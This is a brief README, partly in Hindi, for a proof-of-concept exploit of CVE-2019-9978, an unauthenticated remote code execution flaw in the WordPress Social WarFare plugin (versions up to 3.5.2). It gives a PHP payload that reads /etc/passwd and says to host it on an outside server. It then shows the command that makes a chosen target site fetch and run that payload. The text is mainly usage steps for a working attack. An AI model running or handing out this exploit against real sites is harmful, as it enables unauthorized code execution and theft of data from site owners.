
CVE-2019-9978 - (PoC) RCE in Social WarFare Plugin (<=3.5.2)
CVE-2019-9978 - (PoC) Social WarFare Plugin में RCE (<=3.5.2)
सेटिंग्स आयात को संभालने वाली कार्यक्षमता में बिना प्रमाणीकरण के रिमोट कोड निष्पादन की खोज की गई है। एक उपयोगकर्ता RFI का उपयोग करके RCE तक पहुँच सकता है।
निम्न पेलोड कॉपी करें:
<pre>system('cat /etc/passwd')</pre>
इसे payload.txt फ़ाइल नाम से सहेजें और एक सर्वर पर अपलोड करें। URI इस प्रकार दिखना चाहिए: http(s)://yoursite.com/payload.txt। अंत में, अपने --target और --payload-uri विकल्प प्रदान करें:
$ python cve-2019-9978.py --target http://vulntarget.com \
--payload-uri http://yourpayloadsite.com/payload.txt

शोधकर्ता: Luka Sikic
लिंक: https://wpvulndb.com/vulnerabilities/9259?fbclid=IwAR2xLSnanccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM
लेखक: @hash3liZer